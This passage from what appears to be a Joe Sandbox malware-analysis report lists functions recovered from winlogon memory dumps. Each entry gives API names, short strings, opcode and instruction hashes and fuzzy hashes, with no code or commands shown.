                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                              • API String ID: 3215553584-4202648911
                                                              • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                              • Instruction ID: 944570b48e0c60bc5ad5e959f3b97a539a301ff4876b6c2567b65f1bc9dbc55e
                                                              • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                              • Instruction Fuzzy Hash: 2961E27E606E6066FE69CBFCE55D32E66A0F785793F54C415EA0A037A4DB34C842C302
                                                              Function 00000225DC67F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071140080.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc670000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                              • API String ID: 3215553584-4202648911
                                                              • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                              • Instruction ID: b809d82d10e30da49faebdcfad985b935ab92b62efaa54905c9af04f2a82b3da
                                                              • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                              • Instruction Fuzzy Hash: 6761D63E614E60B2FA65DBFCD55CB2A26A0E785742F51CD15EA1A07FE4DB34C842C382
                                                              Function 00000225DC64AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CallEncodePointerTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3544855599-2084237596
                                                              • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction ID: 5ee5bc15fcc7ca4683ce8519a978933ac552fc7779cbca0cf07b2e2c35c6d78e
                                                              • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction Fuzzy Hash: 6561CF3B608F94AAEB20DFA9D04439D7BA1F348B8DF148255EF4A17B99DB38C085C700
                                                              Function 00000225DC6AAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CallEncodePointerTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3544855599-2084237596
                                                              • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction ID: aa70c4840d0660077c5495364ee98befc91b92371ab933d55f9a834b1db71008
                                                              • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction Fuzzy Hash: 4761BE3B600F949AEB20DFA9D04439D77A0F748B8DF248216EF4A53B99DB38D085CB00
                                                              Function 00000225DC64AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction ID: e2a4ec1541559836ceca0d34c116ae26037d4692d9dd8773577d8c71d6944edc
                                                              • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction Fuzzy Hash: 9C51C37A10CBA0FAEB748F9A948835977A0F354B86F24C159FA5A47BD7CB38C451C700
                                                              Function 00000225DC6AAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction ID: 2e3fcafa7e63c7afecd5eb320568e29d6bc18ccae88d7ce5c4c248ffc38c6f0c
                                                              • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction Fuzzy Hash: 9C51837A100BA0AAEB74CF99958835D77A0F758B86F34C117EA99C7BD6CB34D451CB00
                                                              Function 00000225DC61A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070618302.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc610000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction ID: 4352b4e7d2f757b2eeab07a41cb79b5cce5006a568909e68af21b5ba570d396d
                                                              • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction Fuzzy Hash: 9B51C23A105BA0EAEF748F99944835877A0F355B97F28C215EB89C7BD6CB38C451C700
                                                              Function 00000225DC67A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071140080.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc670000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction ID: d8bc5406c68cbc3a3f3e81927d6ca097891e5497fb3224580501911da265d3db
                                                              • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction Fuzzy Hash: 7D51E83A104BA0DAEB748FA9944835C77A0F355B96F28E615FB5987FD6CB38D490CB00
                                                              Function 00000225DC618405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070618302.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc610000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritable__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 3242871069-629598281
                                                              • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction ID: 8a2ee0853dea6fc810b70285cdad8afa924fb268fca63da5ab5c18953c58d14e
                                                              • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction Fuzzy Hash: 9F51BF3A712A20AAEF94CF99E448B1937A5F358B9FF52C224DE0647788EB34CC41C704
                                                              Function 00000225DC678405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071140080.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc670000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritable__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 3242871069-629598281
                                                              • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction ID: 8bc61f57c5687e7a86239f1075434ff38e81a80eea30d95d659fdd3eaf197c62
                                                              • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction Fuzzy Hash: DD51BF3A711A20AAFB94CF69E448B193795F758B9FF51CA24DA0663BC8EB74CC41C704
                                                              Function 00000225DC6183E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070618302.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc610000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritable__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 3242871069-629598281
                                                              • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction ID: a13f22b0c5ddbfd73ffef1e451b0b481ee6602808d75d20c911345d57e3c4186
                                                              • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction Fuzzy Hash: A731C03A602B60A6EB64DF5AE84871977A4F748BDFF16C214EE5B47784DB38C940C704
                                                              Function 00000225DC6783E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071140080.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc670000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritable__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 3242871069-629598281
                                                              • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction ID: 7ede24912a818c19e80a806750f1858c6928fd0ae1f237999a321a790690d3dd
                                                              • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction Fuzzy Hash: F731BF3A211B60E6EB54DF69E8487193BA4F748B9AF15CA14EE5A13BC8DB38CD40C704
                                                              Function 00000225DC652058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                              • String ID:
                                                              • API String ID: 2718003287-0
                                                              • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                              • Instruction ID: bfa2cf39ed762a0c864f02a182d0b99d9a486c982741babc9b475573dd9f7606
                                                              • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                              • Instruction Fuzzy Hash: F7D1F376724E90A9E712CFB9D44839C3BB1F754799F248216CF5E97B99DA34C406C340
                                                              Function 00000225DC6B2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                              • String ID:
                                                              • API String ID: 2718003287-0
                                                              • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                              • Instruction ID: 01741f095c584cdd00ba98e3aa790e67a4177efe8c0c1c6c5439ed656a32a405
                                                              • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                              • Instruction Fuzzy Hash: F2D1FF76B14E90A9E712CFA9D44839C7BF2F75479AF108216CF6E97B99DA34C406C340
                                                              Function 00000225DC6414A4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Free
                                                              • String ID:
                                                              • API String ID: 3168794593-0
                                                              • Opcode ID: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                              • Instruction ID: 6bfd24914fe268a9eaf32d670607eda920269b08af1813506c338134dac0ed3e
                                                              • Opcode Fuzzy Hash: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                              • Instruction Fuzzy Hash: E2115E7A524FA0E6E724DFEEA80816977A0FB89F86F148025DB4A53726DE34C451C740
                                                              Function 00000225DC652980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: ConsoleErrorLastMode
                                                              • String ID:
                                                              • API String ID: 953036326-0
                                                              • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                              • Instruction ID: 6d7b5b403a3188d3b4841f9fb94707250acf1a7d2d8579f267c512fad794f412
                                                              • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                              • Instruction Fuzzy Hash: 7391D67AB20E70A5F766DFAD94883AD3BA0F754B8AF24C109DE0A57795DB34C486C700
                                                              Function 00000225DC6B2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: ConsoleErrorLastMode
                                                              • String ID:
                                                              • API String ID: 953036326-0
                                                              • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                              • Instruction ID: 0effa0560eecda1315c6bac3784fbf95153408d93820f0ff7fe2030bc37eebda
                                                              • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                              • Instruction Fuzzy Hash: F991D37A710E70A5FB62DFAD94883AD3BE2B704B8BF148109DE1A57A95DF34C486C700
                                                              Function 00000225DC6A7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                              • String ID:
                                                              • API String ID: 2933794660-0
                                                              • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                              • Instruction ID: 6c068aa945f0ac6dafb2ede45e1116f91dfe096492dd73cd30e6c0fcb5e07c68
                                                              • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                              • Instruction Fuzzy Hash: A7111226710F1599EF00CFA8E8593A833A4F75975EF441E25DB6D867A4DF78C1A8C380
                                                              Function 00000225DC64253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3081899298-91387939
                                                              • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction ID: 898a99a824d3708835f2c6571b9ade3bad5d2cda467ec0446c5c9970c4b06ed6
                                                              • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction Fuzzy Hash: 6471F63A20CFA166E7269FED98483EA7794F389B86F648066DD0B53B89DE35C541C700
                                                              Function 00000225DC6A253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3081899298-91387939
                                                              • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction ID: 5f5e41b068d0f293cc7ef7899fb07c4c471cec35d55f3e32321b6d3ba8d92876
                                                              • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction Fuzzy Hash: 0971FB3A280FA166D726DFADD8483AA6794F385B86F648025DD0ED3B89DE35C645C700
                                                              Function 00000225DC619E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070618302.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc610000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CallTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3163161869-2084237596
                                                              • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction ID: 1c103488b81b5755e9a858689f9c8f9220dbcbf2f2fcf3c8ea21b2028d61d58d
                                                              • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction Fuzzy Hash: C5619D3B602F549AEB20CFA9D44439D7BA0F748B8EF148215EF4917B99DB38D156C700
                                                              Function 00000225DC679E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071140080.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc670000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CallTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3163161869-2084237596
                                                              • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction ID: 9fd3008523d1d31d7ee32bda0e514125121f93270c61e4c83d0e3fe2aa1cbd72
                                                              • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction Fuzzy Hash: 4B61AB3B600F949AEB20DFA9D44439D77A0F748B8DF148A15EF4917B99DB38D496C700
                                                              Function 00000225DC642330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3081899298-91387939
                                                              • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                              • Instruction ID: 46897ffc2cc2630562e995aa3ab88a20c60a5fe9943d3a7bd5f75d2a5dc7dda7
                                                              • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                              • Instruction Fuzzy Hash: 8051273A60CFA1A1E6799FEDE05C37A7B51F784B41F648165CE4B03B49CA39C544C740
                                                              Function 00000225DC6A2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3081899298-91387939
                                                              • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                              • Instruction ID: a83db0d25de40b44f666c5a5d64bcfc4ffcb5cd7079b315c16954b0aa5d8d6a1
                                                              • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                              • Instruction Fuzzy Hash: 0F516B3A284FA1A5F63ADFADE09C3BAA751F785B41F648125CE4D83B49CE39C544C740
                                                              Function 00000225DC6526F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: U
                                                              • API String ID: 442123175-4171548499
                                                              • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                              • Instruction ID: ff598f2dff618ae855125180d135eff0feb50115b417593be16094bb43c2f728
                                                              • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                              • Instruction Fuzzy Hash: BC41C476325E90A6DB21CFA9E8483AE77A0F798795F508021EE4E87794EB7CC445C740
                                                              Function 00000225DC6B26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: U
                                                              • API String ID: 442123175-4171548499
                                                              • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                              • Instruction ID: 2b7cbdf29e740ea36268c330b496c3bcbbcaca586992bcfa57e7be5236719281
                                                              • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                              • Instruction Fuzzy Hash: F0412A76314F90A2EB21DFA9E8483A977A1F398796F508021EE4D87794EF3CC445C740
                                                              Function 00000225DC6494A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFileHeaderRaise
                                                              • String ID: csm
                                                              • API String ID: 2573137834-1018135373
                                                              • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                              • Instruction ID: 8e6f9ddc8bd4a0050d82363797f3a651ef4e3f91162d625b6a7f86f7e5c4113b
                                                              • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                              • Instruction Fuzzy Hash: CF115B36218F9092EB608B59E40435977E4FB88B99F288260EF8D47B68DF3CC552CB00
                                                              Function 00000225DC6A94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFileHeaderRaise
                                                              • String ID: csm
                                                              • API String ID: 2573137834-1018135373
                                                              • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                              • Instruction ID: c91e1e86bab824f286d7942031cacff95a827eda15b7eec0a60a9f277f66f1ea
                                                              • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                              • Instruction Fuzzy Hash: 54112B3A218F9092EB65CB59E44435977E5FB88B99F688220EF8C47768DF3CC552CB00
                                                              Function 00000225DC617356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070618302.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                              Joe Sandbox IDA Plugin
